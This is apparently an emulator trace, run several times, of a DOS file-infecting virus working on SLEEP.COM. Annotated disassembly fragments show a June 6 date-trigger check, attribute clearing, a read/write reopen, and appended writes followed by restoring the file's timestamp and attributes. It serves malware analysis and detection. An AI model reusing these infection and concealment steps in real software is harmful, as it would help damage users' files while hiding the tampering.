2018-12-25T12:03:29.424292061Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.427851332Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.435191749Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.441895003Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.444602494Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.455583073Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.457780142Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.464752706Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.468139694Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.470675561Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.47320457Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.489354599Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.498750408Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.500170785Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.508191759Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.518133313Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
; Dump following the "Get date" call logged on the line above (INT 21h AH=2Ah returns
; DH = month, DL = day), where `cmp dx, 0x606` tests for month 6, day 6. A match goes
; to 0x12d4f (not shown); any other date goes to 0x12dba. In this trace the
; non-matching path ran - the next logged calls are the "Change current directory"
; entries at PC 12dc5 and 12dcd - so the code at 0x12d4f was not exercised by this run.
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
; NOTE(review): execution does not continue past the unconditional jump above; the
; rest is the bytes that follow in memory, decoded linearly. 0x12b6c-0x12b74 look like
; data read as instructions, and the decode is out of step with the real code:
; `add byte ptr [di - 0x75], dl` encodes as 00 55 8B and `in al, dx` as EC, so a
; `push bp` / `mov bp, sp` prologue probably starts at 0x12b75 - confirm against the bytes.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2c bytes of stack, save SI, and continue at 0x12bed (not shown).
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
; INT 21h AH=1Ah: set the disk transfer address to the buffer at [bp - 0x2c].
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; Set-up for INT 21h AH=4Eh (find first) with attribute mask CX=0x10, which includes
; directory entries; the search pattern is at 0x1aa + word at [0x106]. The INT itself
; lies past the end of this dump.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.520335053Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.52475261Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.428949687Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.43303766Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.438316153Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.441449656Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.448530383Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.456428798Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:29.464622276Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Dump taken at the PC where the "Get time" call logged on the line above returned
; (INT 21h AH=2Ch: DH = seconds, DL = hundredths); `add dl, dh` has just summed the two.
; A zero sum branches back to 0x12caa, presumably to ask for the time again, so the
; byte stored below is never 0.
0x12cb0: je 0x12caa
; si = 0x115 + word at [0x106]; [0x106] looks like a base the code adds to its own
; data offsets (TODO confirm). The time-derived byte is stored there; what it is
; used for is not visible in this fragment.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
; INT 21h AX=4301h with CX=0: set the attributes of the path at DX = si + 0xbc to
; none, which removes read-only. Logged as "Get or set file attributes", PC 12cc8.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h AH=3Eh: close the handle in BX (presumably the one opened at PC 12c31).
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h AX=3D02h: open for read/write; DX is not reloaded, so it is the same path.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave through 0x12c52 (not shown).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at es:[dx + 0x62], then move it into BX, where the
; write calls logged next expect it.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.466982223Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.491400143Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.500607283Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.508084753Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.511160813Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.514757094Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.517737943Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.519922315Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.530989206Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.533089877Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.542085866Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.554216289Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.557366842Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.564669571Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.572502859Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.575492063Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.586757208Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.589305727Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.598416675Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.601543414Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.610674011Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.613016667Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.614472873Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.621653411Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.639342539Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.647351836Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.655367974Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.659256676Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.666752613Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.674362317Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.677600502Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.686728131Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.688925163Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.693732624Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.695744475Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.697581718Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.699913532Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.702047479Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.711214365Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.71263302Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.721949316Z 67 PC: 12d4a | Get or set file attributes (See above)
; Disassembly window the emulator printed with the "Get date" row: 20
; instructions decoded linearly from the logged PC 0x12b60. Only the first
; four are certainly code on this path; the decode then runs on through the
; bytes that sit behind an unconditional jmp.
; INT 21h/AH=2Ah returns DH = month and DL = day, so the compare in the row
; below tests for 6 June (0x0606): a date-trigger check.
; NOTE(review): the JSON record printed with each run lists Day 1 / Month 1;
; if that is the emulated clock, the compare fails and this run never
; exercises the 0x12d4f branch - confirm before treating the trace as complete.
2018-12-25T12:03:29.7330519Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
; Any other date: continue at 0x12dba. The next trace rows (PC 12dc5, 12dcd)
; lie just past that address.
0x12b66: jmp 0x12dba
; Date matched: 0x12d4f is outside this window, so what runs on the trigger
; date cannot be read from here.
0x12b69: jmp 0x12d4f
; Nothing visible branches to 0x12b6c and it follows an unconditional jmp, so
; the next lines are probably data decoded as instructions - TODO confirm.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
; NOTE(review): the next two lines would encode as 00 55 8B EC (reconstructed
; from the mnemonics). Decoded from 0x12b75 instead, 55 / 8B EC is
; push bp / mov bp, sp, which fits the sub sp, 0x2c and [bp - 0x2c] below.
; The decode is likely misaligned here and a routine likely starts at
; 0x12b75 - verify against the raw bytes.
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2C bytes of stack.
0x12b78: sub sp, 0x2c
0x12b7b: push si
; Forward jump to 0x12bed, outside this window; the lines below are not
; reached by fall-through.
0x12b7c: jmp 0x12bed
; INT 21h/AH=1Ah: set the disk transfer address to the 0x2C-byte stack buffer.
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; INT 21h/AH=4Eh: find first; attribute mask 0x10 includes directory entries.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
; DS:DX = 0x1AA + word at DS:0x106 (search pattern; its text is not shown).
; The same word is added to 0x115 in the "Get time" window, so it looks like
; a load-base value - assumption.
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.735607909Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.743370564Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.45890108Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.463361126Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.468019276Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.469640002Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.484210361Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.49155442Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window the emulator printed with the "Get time" row: 20
; instructions from the logged PC 0x12cae, where execution resumes after the
; call. INT 21h function numbers below are read from the AH/AX values loaded
; here; they match the "Syscall Op" column of the rows that follow
; (67 = 43h, 62 = 3Eh, 61 = 3Dh).
; Detection-relevant sequence: attributes are cleared, the file is closed and
; reopened read/write, and the trace then logs the writes.
; INT 21h/AH=2Ch returns DH = seconds and DL = hundredths; the row below sums
; them into DL.
2018-12-25T12:03:29.500177344Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Sum was zero: branch back to 0x12caa, 4 bytes before this window
; (presumably the call is repeated until the byte is non-zero).
0x12cb0: je 0x12caa
; SI = 0x115 + word at DS:0x106. The same word is added to 0x1AA in the
; "Get date" window, so it looks like a load-base value - assumption.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
; Store the time-derived byte in the program's own data. Its use is not
; visible here (a per-copy key or marker would fit - TODO confirm).
0x12cb9: mov byte ptr [si], dl
; INT 21h/AX=4301h: set file attributes; CX = 0 clears every attribute bit,
; including read-only. DS:DX = SI + 0xBC is the path argument.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h/AH=3Eh: close; the handle in BX was set before this window.
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h/AX=3D02h: open with access mode 2 (read/write). DX is not reloaded,
; so the same path is used.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave via 0x12c52
; (outside this window).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at ES:[DX + 0x62], then move it into BX for the
; calls that follow.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.503040037Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.521924786Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.524460525Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.532368741Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.536978329Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.54025177Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.543503022Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.546675158Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.557856121Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.559994297Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.569865372Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.581082438Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.584124688Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.592428515Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.600144788Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.602931303Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.615788073Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.618232284Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.625986282Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.629257619Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.632905689Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.63615722Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.638635963Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.652772382Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.655414364Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.664368029Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.677487381Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.681706322Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.690413139Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.699324038Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.701944506Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.713102231Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.716066013Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.723890624Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.727516333Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.730947203Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.734738734Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.736902254Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.747199779Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.749567944Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.758247596Z 67 PC: 12d4a | Get or set file attributes (See above)
; Disassembly window the emulator printed with the "Get date" row: 20
; instructions decoded linearly from the logged PC 0x12b60. Only the first
; four are certainly code on this path; the decode then runs on through the
; bytes that sit behind an unconditional jmp.
; INT 21h/AH=2Ah returns DH = month and DL = day, so the compare in the row
; below tests for 6 June (0x0606): a date-trigger check.
; NOTE(review): the JSON record printed with each run lists Day 1 / Month 1;
; if that is the emulated clock, the compare fails and this run never
; exercises the 0x12d4f branch - confirm before treating the trace as complete.
2018-12-25T12:03:29.769307952Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
; Any other date: continue at 0x12dba. The next trace rows (PC 12dc5, 12dcd)
; lie just past that address.
0x12b66: jmp 0x12dba
; Date matched: 0x12d4f is outside this window, so what runs on the trigger
; date cannot be read from here.
0x12b69: jmp 0x12d4f
; Nothing visible branches to 0x12b6c and it follows an unconditional jmp, so
; the next lines are probably data decoded as instructions - TODO confirm.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
; NOTE(review): the next two lines would encode as 00 55 8B EC (reconstructed
; from the mnemonics). Decoded from 0x12b75 instead, 55 / 8B EC is
; push bp / mov bp, sp, which fits the sub sp, 0x2c and [bp - 0x2c] below.
; The decode is likely misaligned here and a routine likely starts at
; 0x12b75 - verify against the raw bytes.
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2C bytes of stack.
0x12b78: sub sp, 0x2c
0x12b7b: push si
; Forward jump to 0x12bed, outside this window; the lines below are not
; reached by fall-through.
0x12b7c: jmp 0x12bed
; INT 21h/AH=1Ah: set the disk transfer address to the 0x2C-byte stack buffer.
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; INT 21h/AH=4Eh: find first; attribute mask 0x10 includes directory entries.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
; DS:DX = 0x1AA + word at DS:0x106 (search pattern; its text is not shown).
; The same word is added to 0x115 in the "Get time" window, so it looks like
; a load-base value - assumption.
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.772695311Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.777435409Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.544034166Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.548330782Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.552331969Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.55358862Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.560783339Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.567385668Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window the emulator printed with the "Get time" row: 20
; instructions from the logged PC 0x12cae, where execution resumes after the
; call. INT 21h function numbers below are read from the AH/AX values loaded
; here; they match the "Syscall Op" column of the rows that follow
; (67 = 43h, 62 = 3Eh, 61 = 3Dh).
; Detection-relevant sequence: attributes are cleared, the file is closed and
; reopened read/write, and the trace then logs the writes.
; INT 21h/AH=2Ch returns DH = seconds and DL = hundredths; the row below sums
; them into DL.
2018-12-25T12:03:29.573826711Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Sum was zero: branch back to 0x12caa, 4 bytes before this window
; (presumably the call is repeated until the byte is non-zero).
0x12cb0: je 0x12caa
; SI = 0x115 + word at DS:0x106. The same word is added to 0x1AA in the
; "Get date" window, so it looks like a load-base value - assumption.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
; Store the time-derived byte in the program's own data. Its use is not
; visible here (a per-copy key or marker would fit - TODO confirm).
0x12cb9: mov byte ptr [si], dl
; INT 21h/AX=4301h: set file attributes; CX = 0 clears every attribute bit,
; including read-only. DS:DX = SI + 0xBC is the path argument.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h/AH=3Eh: close; the handle in BX was set before this window.
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h/AX=3D02h: open with access mode 2 (read/write). DX is not reloaded,
; so the same path is used.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave via 0x12c52
; (outside this window).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at ES:[DX + 0x62], then move it into BX for the
; calls that follow.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.576167383Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.58840705Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.59011156Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.59660281Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.600035166Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.602861446Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.605746627Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.608895291Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.61950292Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.621050426Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.630330663Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.640529562Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.64351353Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.650836441Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.657479436Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.659957179Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.674350246Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.676232517Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.688210278Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.695307443Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.697843925Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.700824808Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.702955699Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.726650514Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.728189686Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.742577248Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.753194125Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.756104541Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.762833351Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.770326708Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.772750082Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.782712448Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.785609936Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.792651494Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.795596853Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.798777406Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.801518416Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.803420742Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.813477355Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.815751342Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.823467348Z 67 PC: 12d4a | Get or set file attributes (See above)
; Disassembly window the emulator printed with the "Get date" row: 20
; instructions decoded linearly from the logged PC 0x12b60. Only the first
; four are certainly code on this path; the decode then runs on through the
; bytes that sit behind an unconditional jmp.
; INT 21h/AH=2Ah returns DH = month and DL = day, so the compare in the row
; below tests for 6 June (0x0606): a date-trigger check.
; NOTE(review): the JSON record printed with each run lists Day 1 / Month 1;
; if that is the emulated clock, the compare fails and this run never
; exercises the 0x12d4f branch - confirm before treating the trace as complete.
2018-12-25T12:03:29.833040146Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
; Any other date: continue at 0x12dba. The next trace rows (PC 12dc5, 12dcd)
; lie just past that address.
0x12b66: jmp 0x12dba
; Date matched: 0x12d4f is outside this window, so what runs on the trigger
; date cannot be read from here.
0x12b69: jmp 0x12d4f
; Nothing visible branches to 0x12b6c and it follows an unconditional jmp, so
; the next lines are probably data decoded as instructions - TODO confirm.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
; NOTE(review): the next two lines would encode as 00 55 8B EC (reconstructed
; from the mnemonics). Decoded from 0x12b75 instead, 55 / 8B EC is
; push bp / mov bp, sp, which fits the sub sp, 0x2c and [bp - 0x2c] below.
; The decode is likely misaligned here and a routine likely starts at
; 0x12b75 - verify against the raw bytes.
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2C bytes of stack.
0x12b78: sub sp, 0x2c
0x12b7b: push si
; Forward jump to 0x12bed, outside this window; the lines below are not
; reached by fall-through.
0x12b7c: jmp 0x12bed
; INT 21h/AH=1Ah: set the disk transfer address to the 0x2C-byte stack buffer.
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; INT 21h/AH=4Eh: find first; attribute mask 0x10 includes directory entries.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
; DS:DX = 0x1AA + word at DS:0x106 (search pattern; its text is not shown).
; The same word is added to 0x115 in the "Get time" window, so it looks like
; a load-base value - assumption.
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.835685253Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.839556784Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.844601896Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.848890937Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.852926275Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.853864719Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.860209261Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.866556001Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window the emulator printed with the "Get time" row: 20
; instructions from the logged PC 0x12cae, where execution resumes after the
; call. INT 21h function numbers below are read from the AH/AX values loaded
; here; they match the "Syscall Op" column of the rows that follow
; (67 = 43h, 62 = 3Eh, 61 = 3Dh).
; Detection-relevant sequence: attributes are cleared, the file is closed and
; reopened read/write, and the trace then logs the writes.
; INT 21h/AH=2Ch returns DH = seconds and DL = hundredths; the row below sums
; them into DL.
2018-12-25T12:03:29.872550501Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Sum was zero: branch back to 0x12caa, 4 bytes before this window
; (presumably the call is repeated until the byte is non-zero).
0x12cb0: je 0x12caa
; SI = 0x115 + word at DS:0x106. The same word is added to 0x1AA in the
; "Get date" window, so it looks like a load-base value - assumption.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
; Store the time-derived byte in the program's own data. Its use is not
; visible here (a per-copy key or marker would fit - TODO confirm).
0x12cb9: mov byte ptr [si], dl
; INT 21h/AX=4301h: set file attributes; CX = 0 clears every attribute bit,
; including read-only. DS:DX = SI + 0xBC is the path argument.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h/AH=3Eh: close; the handle in BX was set before this window.
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h/AX=3D02h: open with access mode 2 (read/write). DX is not reloaded,
; so the same path is used.
